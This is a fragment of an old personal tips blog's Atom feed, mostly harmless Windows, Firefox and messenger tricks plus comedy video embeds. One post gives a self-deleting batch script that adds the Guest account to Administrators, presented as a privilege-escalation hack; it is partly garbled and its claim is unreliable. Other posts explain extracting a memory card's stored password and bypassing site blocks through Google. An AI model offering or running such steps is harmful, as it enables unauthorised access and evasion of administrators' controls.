class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-4868560716118846039?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/4868560716118846039/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=4868560716118846039&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/4868560716118846039'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/4868560716118846039'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2008/01/restart-windows-server-2003-from.html' title='Restart Windows Server 2003 from the command line'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-6842051563677987012</id><published>2008-01-08T22:18:00.000+11:00</published><updated>2008-01-08T22:19:36.771+11:00</updated><title type='text'>Move Windows XP’s Quick Launch toolbar  where ever you want</title><content type='html'>1. Position your mouse pointer over the vertical bar on the left edge of the Quick Launch toolbar until your cursor turns into a double‐headed arrow.&lt;br /&gt;&lt;br /&gt;2. Drag the Quick Launch toolbar to any location on the desktop — you can anchor it to the top, left, or right edge of the desktop.&lt;br /&gt;&lt;br /&gt;3. Once you position it where you want, you can right‐click on the toolbar and select the Always On Top command so that you can always access the Quick Launch toolbar just like you can the taskbar.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-6842051563677987012?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/6842051563677987012/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=6842051563677987012&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/6842051563677987012'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/6842051563677987012'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2008/01/move-windows-xps-quick-launch-toolbar.html' title='Move Windows XP’s Quick Launch toolbar  where ever you want'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-4493705597648751452</id><published>2007-12-15T19:39:00.001+11:00</published><updated>2007-12-15T19:45:21.951+11:00</updated><title type='text'>WORK MULTIPLE YAHOO MESSANGERS SIMULTANEOUS</title><content type='html'>1. Go to Start --&gt; Run . Type regedit, then enter.&lt;br /&gt;&lt;br /&gt;2. Navigate to HKEY_CURRENT_ USER --&gt; Software --&gt;yahoo --&gt;pager--&gt;Test&lt;br /&gt;&lt;br /&gt;3. On the right page , right-click and choose new Dword value .&lt;br /&gt;&lt;br /&gt;4. Rename it as Plural.&lt;br /&gt;&lt;br /&gt;5. Double click and assign a decimal value of 1.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-4493705597648751452?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/4493705597648751452/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=4493705597648751452&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/4493705597648751452'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/4493705597648751452'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/12/work-multiple-yahoo-messangers.html' title='WORK MULTIPLE YAHOO MESSANGERS SIMULTANEOUS'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-8936501136179560314</id><published>2007-12-15T19:25:00.000+11:00</published><updated>2007-12-15T19:26:14.830+11:00</updated><title type='text'>Increase ur browsing speed in Mozila Fire Fox</title><content type='html'>Speed up your firefox browser and load pages about 20% faster than previous.&lt;br /&gt;&lt;br /&gt;1. Type "about:config" into the address bar and hit return. Scroll down and look for the following entries:network.http.pipeliningnetwork.http.proxy.pipeliningnetwork.http.pipelining.maxrequestsNormally the browser will make one request to a web page at a time. When you enable pipelining it will make several at once, which really speeds up page loading.&lt;br /&gt;&lt;br /&gt;2. Alter the entries as follows:Set "network.http.pipelining" to "true"Set "network.http.proxy.pipelining" to "true"Set "network.http.pipelining.maxrequests" to some number like 30. This means it will make 30 requests at once.&lt;br /&gt;&lt;br /&gt;3. Lastly right-click anywhere and select New-&gt; Integer. Name it "nglayout.initialpaint.delay" and set its value to "0". This value is the amount of time the browser waits before it acts on information it recieves.If you're using a broadband connection you'll load pages 2-3 times faster now.mozila net increase speed&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-8936501136179560314?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/8936501136179560314/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=8936501136179560314&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/8936501136179560314'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/8936501136179560314'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/12/increase-ur-browsing-speed-in-mozila.html' title='Increase ur browsing speed in Mozila Fire Fox'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-3660062165243807226</id><published>2007-12-15T19:13:00.000+11:00</published><updated>2007-12-15T19:18:07.892+11:00</updated><title type='text'>Block websites without any software</title><content type='html'>&lt;strong&gt;&lt;em&gt;Steps&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;1.    Browse C:\WINDOWS\system32\drivers\etc&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;2.    Find the file named "HOSTS"&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;3.    Open it in notepad&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;4.    Under "127.0.0.1 localhost" Add 127.0.0.2 www.orkut.com , and that site will no longer be accessable.&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;example :&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;127.0.0.1 localhost&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;127.0.0.2 &lt;/em&gt;&lt;/strong&gt;&lt;a href="http://www.orkut.com/"&gt;&lt;strong&gt;&lt;em&gt;www.orkut.com&lt;/em&gt;&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;a href="http://www.orkut.com/"&gt;&lt;strong&gt;&lt;em&gt;www.orkut.com&lt;/em&gt;&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt;&lt;em&gt; is now unaccessable&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;For every site after that you want to add, just add "1" to the last number in the internal ip (127.0.0.2) and then the add like before.&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;IE:&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;127.0.0.3 &lt;/em&gt;&lt;/strong&gt;&lt;a href="http://www.yahoo.com/"&gt;&lt;strong&gt;&lt;em&gt;www.yahoo.com&lt;/em&gt;&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;127.0.0.4 &lt;/em&gt;&lt;/strong&gt;&lt;a href="http://www.msn.com/"&gt;&lt;strong&gt;&lt;em&gt;www.msn.com&lt;/em&gt;&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;127.0.0.5 www.google.com&lt;/em&gt;&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-3660062165243807226?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/3660062165243807226/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=3660062165243807226&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/3660062165243807226'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/3660062165243807226'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/12/block-websites-without-any-software.html' title='Block websites without any software'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-6524030694160394107</id><published>2007-12-15T19:09:00.000+11:00</published><updated>2007-12-15T19:12:38.402+11:00</updated><title type='text'>Login with multiple id at the same time in orkut , gmail , yahoo</title><content type='html'>To perform this trick u need firefox mozilla browserIf u don't have mozilla ff u can download it from hereLook on right sidebar for mozilla firefox with google toolbarIt is absolutely free&lt;br /&gt;&lt;br /&gt;Step&lt;br /&gt;1:    open system properties(by right clicking my computer), choose tab advanced, click to environment variables button. in system variables section, click new. type this information to each textbox.variable name: moz_no_remote(should be all small letter)variable value: 1press ok to close all windows.step&lt;br /&gt;&lt;br /&gt;2:    open firefox icon's properties(from desktop and quick launch). add extension -p to command line(like "c:\program files\mozilla firefox\firefox.exe" -p). press ok.while starting firefox u have to create two separate profiles of firefox so that u can login to two accounts of any(orkut,yahoo,rediff or anything else).......for three logins create three profiles of firefox.........&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-6524030694160394107?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/6524030694160394107/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=6524030694160394107&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/6524030694160394107'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/6524030694160394107'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/12/login-with-multiple-id-at-same-time-in.html' title='Login with multiple id at the same time in orkut , gmail , yahoo'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-6524405128956542613</id><published>2007-12-15T18:59:00.000+11:00</published><updated>2007-12-15T19:01:31.872+11:00</updated><title type='text'>Crack MMC password</title><content type='html'>&lt;strong&gt;&lt;em&gt;Steps&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;1.     Install the File explorer Software e.g. SELQ of Fileman thru data Cable or Bluetooth in Phone memory&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;2.    Then Insert The Blocked MMC&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;3.    Open the File Explorer Software&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;4.    goto C:\ i.e Phone Memory&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;5.    goto System&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;6.    Goto Find and Search MMcstore&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;7.    Send this file by Bluetooth or Infraread to your PC&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;8.    Rename the file MMCSTORE to MMCSTORE.TXT&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;9.    pen the file and the password off the MMC are there&lt;/em&gt;&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-6524405128956542613?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/6524405128956542613/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=6524405128956542613&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/6524405128956542613'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/6524405128956542613'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/12/crack-mmc-password.html' title='Crack MMC password'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-7810621489246379194</id><published>2007-12-15T18:44:00.000+11:00</published><updated>2007-12-15T18:56:25.726+11:00</updated><title type='text'>How to use Google as proxy</title><content type='html'>1:     The first and most common way of using google to bypass blocked sites is just to search for the site and then clicked the "cached" link that appears on google. Easy, simple, and frequently works for static information.&lt;br /&gt;&lt;br /&gt;2:     Passing the site through google translator works well as well. Here's the URL to use:Code:http://www.google.com/translate?langpair=enen&amp;amp;u=www.blockedsite.com(where blockedsite.com is the site that you wish to visit)This translates the site from english to english and works because the ip address will appear as google instead of you. Here's a link to tech-recipes passed through the translator as an example. You can actually do this with any langpair. Change enen in the URL above to spanish by using eses and it still works.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-7810621489246379194?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/7810621489246379194/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=7810621489246379194&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/7810621489246379194'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/7810621489246379194'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/12/how-to-use-google-as-proxy.html' title='How to use Google as proxy'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-1424908951735690297</id><published>2007-12-15T18:26:00.000+11:00</published><updated>2007-12-15T18:44:01.930+11:00</updated><title type='text'>Get Admin Privileges when you are log on as guest user</title><content type='html'>&lt;strong&gt;&lt;em&gt;Want admin privileges on your pc, when you are log on as guest user&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;Copy and paste the code given below in notepad and save it as anyname.bat(not txt)&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;Than double click on it. This will add Guest user in administrators group&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;echo off&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;title Please wait...&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;clsnet user add Username Password /add&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;net user localgroup Administrators Username /add&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;net user Guest 420 /active:yes&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;net localgroup Guests Guest /DELETE&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;net localgroup Administrators Guest /add&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;del %0&lt;/em&gt;&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-1424908951735690297?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/1424908951735690297/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=1424908951735690297&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/1424908951735690297'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/1424908951735690297'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/12/get-admin-privileges-when-you-are-log.html' title='Get Admin Privileges when you are log on as guest user'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-8558819512255194417</id><published>2007-12-04T22:11:00.001+11:00</published><updated>2007-12-04T22:11:19.362+11:00</updated><title type='text'>Russell Peters</title><content type='html'>&lt;div xmlns='http://www.w3.org/1999/xhtml'&gt;&lt;p&gt;&lt;object height='350' width='425'&gt;&lt;param value='http://youtube.com/v/24Ryj1ywoqw' name='movie'/&gt;&lt;embed height='350' width='425' type='application/x-shockwave-flash' src='http://youtube.com/v/24Ryj1ywoqw'/&gt;&lt;/object&gt;&lt;/p&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-8558819512255194417?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/8558819512255194417/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=8558819512255194417&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/8558819512255194417'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/8558819512255194417'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/12/russell-peters.html' title='Russell Peters'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-8585526939969399994</id><published>2007-12-04T22:10:00.005+11:00</published><updated>2007-12-04T22:10:59.820+11:00</updated><title type='text'>Russell Peters Indian Accent</title><content type='html'>&lt;div xmlns='http://www.w3.org/1999/xhtml'&gt;&lt;p&gt;&lt;object height='350' width='425'&gt;&lt;param value='http://youtube.com/v/vw6RgIf6epQ' name='movie'/&gt;&lt;embed height='350' width='425' type='application/x-shockwave-flash' src='http://youtube.com/v/vw6RgIf6epQ'/&gt;&lt;/object&gt;&lt;/p&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-8585526939969399994?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/8585526939969399994/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=8585526939969399994&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/8585526939969399994'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/8585526939969399994'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/12/russell-peters-indian-accent.html' title='Russell Peters Indian Accent'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-3384247931841562503</id><published>2007-12-04T22:10:00.003+11:00</published><updated>2007-12-04T22:10:45.371+11:00</updated><title type='text'>Russell Peters - Asians</title><content type='html'>&lt;div xmlns='http://www.w3.org/1999/xhtml'&gt;&lt;p&gt;&lt;object height='350' width='425'&gt;&lt;param value='http://youtube.com/v/AxbrXD0kgrQ' name='movie'/&gt;&lt;embed height='350' width='425' type='application/x-shockwave-flash' src='http://youtube.com/v/AxbrXD0kgrQ'/&gt;&lt;/object&gt;&lt;/p&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-3384247931841562503?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/3384247931841562503/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=3384247931841562503&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/3384247931841562503'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/3384247931841562503'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/12/russell-peters-asians.html' title='Russell Peters - Asians'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-3114071941545485397</id><published>2007-12-04T22:10:00.001+11:00</published><updated>2007-12-04T22:10:19.090+11:00</updated><title type='text'>Russell Peters Accents Clip</title><content type='html'>&lt;div xmlns='http://www.w3.org/1999/xhtml'&gt;&lt;p&gt;&lt;object height='350' width='425'&gt;&lt;param value='http://youtube.com/v/setLfUYi8cc' name='movie'/&gt;&lt;embed height='350' width='425' type='application/x-shockwave-flash' src='http://youtube.com/v/setLfUYi8cc'/&gt;&lt;/object&gt;&lt;/p&gt;&lt;p&gt;Good one&lt;/p&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-3114071941545485397?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/3114071941545485397/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=3114071941545485397&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/3114071941545485397'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/3114071941545485397'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/12/russell-peters-accents-clip.html' title='Russell Peters Accents Clip'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 